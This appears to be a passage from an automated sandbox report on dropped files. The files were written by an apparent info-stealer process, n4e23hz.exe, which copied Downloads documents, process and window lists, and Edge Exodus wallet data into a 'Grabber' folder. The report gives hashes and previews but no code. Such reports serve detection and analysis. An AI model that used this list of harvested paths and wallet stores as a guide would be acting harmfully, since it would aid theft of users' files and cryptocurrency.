Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Downloads\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Downloads\UMMBDNEQBN.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Downloads\UMMBDNEQBN.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Downloads\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Downloads\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Downloads\WUTJSCBCFX.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Downloads\YPSIACHYXW.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\System\Process.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	18668
Entropy (8bit):	5.65169269694719
Encrypted:	false
SSDEEP:	96:CIubdvMeGhftEznXZnXfZXibqDFlGJ3AZUUm8ueOIAKScCcdA/xagAMW/6wcXaBs:aXfSaqnLKQmwQRSKmJ/9
MD5:	39AE01203881603A9132A42514CB3989
SHA1:	66E4B9FA7C0BCDB67ADFC5B44DBEFC6FEA648D80
SHA-256:	09DD6E103E2407ACB7C4D28BE9FEBA580344072A1BAF64E57DB111971568AC00
SHA-512:	0CFA88A5D9C2E12C29B33378FFF757CBEDF58D3933D72832B2554DD702B151D166BB54E68DE936E036FCEC24013782804D9D6B78690BA97C446BC580752ED229
Malicious:	false
Preview:	NAME: DTWNizJjRnvSnZFjyTncjZnUhiI ..PID: 6464 ..EXE: C:\Program Files (x86)\XMzOnrsmSEgwJGjSqojPJKXACbqMpkrdzsFWtGBQxDmomRp\DTWNizJjRnvSnZFjyTncjZnUhiI.exe..NAME: svchost ..PID: 6032 ..EXE: ..NAME: svchost ..PID: 2152 ..EXE: ..NAME: DTWNizJjRnvSnZFjyTncjZnUhiI ..PID: 1720 ..EXE: C:\Program Files (x86)\XMzOnrsmSEgwJGjSqojPJKXACbqMpkrdzsFWtGBQxDmomRp\DTWNizJjRnvSnZFjyTncjZnUhiI.exe..NAME: explorer ..PID: 2580 ..EXE: ..NAME: DTWNizJjRnvSnZFjyTncjZnUhiI ..PID: 7112 ..EXE: C:\Program Files (x86)\XMzOnrsmSEgwJGjSqojPJKXACbqMpkrdzsFWtGBQxDmomRp\DTWNizJjRnvSnZFjyTncjZnUhiI.exe..NAME: DTWNizJjRnvSnZFjyTncjZnUhiI ..PID: 6488 ..EXE: C:\Program Files (x86)\XMzOnrsmSEgwJGjSqojPJKXACbqMpkrdzsFWtGBQxDmomRp\DTWNizJjRnvSnZFjyTncjZnUhiI.exe..NAME: DTWNizJjRnvSnZFjyTncjZnUhiI ..PID: 6176 ..EXE: C:\Program Files (x86)\XMzOnrsmSEgwJGjSqojPJKXACbqMpkrdzsFWtGBQxDmomRp\DTWNizJjRnvSnZFjyTncjZnUhiI.exe..NAME: fontdrvhost ..PID: 784 ..EXE: ..NAME: smartscreen ..PID: 5584 ..EXE: ..NAME: svchost ..PID: 1176 ..EXE:

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\System\Windows.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	17083
Entropy (8bit):	5.6754489325531345
Encrypted:	false
SSDEEP:	96:ivqXNVjUUJok4ln+PygT4SEKKXeVUWsqLJuVntsA5teG8GPTDMuGqZrMFOTmrGvA:46rZ
MD5:	6D0AD73042D16C73AEF6A759F92447F8
SHA1:	5FDB5DC0F06EE19B0F8F670626EBECF7DB5F6CC8
SHA-256:	E34CA9478D29FDBF35544F57AB101B409407A44656F827A00805B06E366C648A
SHA-512:	42AF4E6CB9824C1324DCE04E428E7DD74B15A843194D3D3D4FD294D69036C0A1043613C9C2BE4D312C76231352B41ED0AFEC69297B3C1C7DD8CF74E4DBBD74D3
Malicious:	false
Preview:	NAME: DTWNizJjRnvSnZFjyTncjZnUhiI..TITLE: New Tab - Google Chrome..PID: 6464..EXE: C:\Program Files (x86)\XMzOnrsmSEgwJGjSqojPJKXACbqMpkrdzsFWtGBQxDmomRp\DTWNizJjRnvSnZFjyTncjZnUhiI.exe..NAME: DTWNizJjRnvSnZFjyTncjZnUhiI..TITLE: New Tab - Google Chrome..PID: 1720..EXE: C:\Program Files (x86)\XMzOnrsmSEgwJGjSqojPJKXACbqMpkrdzsFWtGBQxDmomRp\DTWNizJjRnvSnZFjyTncjZnUhiI.exe..NAME: DTWNizJjRnvSnZFjyTncjZnUhiI..TITLE: New Tab - Google Chrome..PID: 7112..EXE: C:\Program Files (x86)\XMzOnrsmSEgwJGjSqojPJKXACbqMpkrdzsFWtGBQxDmomRp\DTWNizJjRnvSnZFjyTncjZnUhiI.exe..NAME: DTWNizJjRnvSnZFjyTncjZnUhiI..TITLE: New Tab - Google Chrome..PID: 6488..EXE: C:\Program Files (x86)\XMzOnrsmSEgwJGjSqojPJKXACbqMpkrdzsFWtGBQxDmomRp\DTWNizJjRnvSnZFjyTncjZnUhiI.exe..NAME: DTWNizJjRnvSnZFjyTncjZnUhiI..TITLE: New Tab - Google Chrome..PID: 6176..EXE: C:\Program Files (x86)\XMzOnrsmSEgwJGjSqojPJKXACbqMpkrdzsFWtGBQxDmomRp\DTWNizJjRnvSnZFjyTncjZnUhiI.exe..NAME: DTWNizJjRnvSnZFjyTncjZnUhiI..TITLE: New Tab - Google Chrome

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Wallets\Edge_Wallet\Edge_Exodus\CURRENT

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Wallets\Edge_Wallet\Edge_Exodus\LOG

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	363
Entropy (8bit):	5.217688464818446
Encrypted:	false
SSDEEP:	6:k9ihvm81wkn23oH+Tcwt8age8Y55HEZzXELIx2KLlixgq2Pwkn23oH+Tcwt8ages:k9iYbfYeb8rcHEZrEkVLkxgvYfYeb8rX
MD5:	5013EA9522041635E5656EC79B7E69E7
SHA1:	5FB44B2F624ACEAD0147EFC90D8ACFDFD30AAF60
SHA-256:	9605BC1AFB77FEC95C0903FFDE526EFDD31FCEEE7A95F5D3308CEA1B1CFD0A16
SHA-512:	6F40CB446420A0A64A5373220D86864D44E691281F61C0DEC05C7A3A3F734119ADFD556DDF2534C003F216897E8D25D9263EC8ECD83810B2A7B1AAE689DC834D
Malicious:	false
Preview:	2023/10/03-12:48:06.827 4b0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold since it was missing..2023/10/03-12:48:06.833 4b0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Wallets\Edge_Wallet\Edge_Exodus\MANIFEST-000001

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
